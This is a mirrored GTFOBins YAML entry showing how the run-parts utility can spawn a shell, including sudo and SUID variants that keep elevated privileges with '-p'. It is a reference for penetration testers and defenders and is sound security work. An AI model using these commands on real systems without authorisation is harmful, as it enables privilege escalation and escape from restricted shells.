mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-08 04:04:11 +02:00
Close #466. Co-Authored-By: Andrea Cardaci <cyrus.and@gmail.com>
25 lines
522 B
Plaintext
25 lines
522 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
run-parts --new-session --regex '^sh$' /bin
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
run-parts --new-session --regex '^sh$' /bin --arg='-p'
|
|
shell: false
|
|
unprivileged:
|
|
- code: |-
|
|
cp /bin/sh /path/to/temp-dir/
|
|
run-parts /path/to/temp-dir/
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
cp /bin/sh /path/to/temp-dir/
|
|
run-parts /path/to/temp-dir/ --arg='-p'
|
|
shell: false
|
|
unprivileged:
|
|
...
|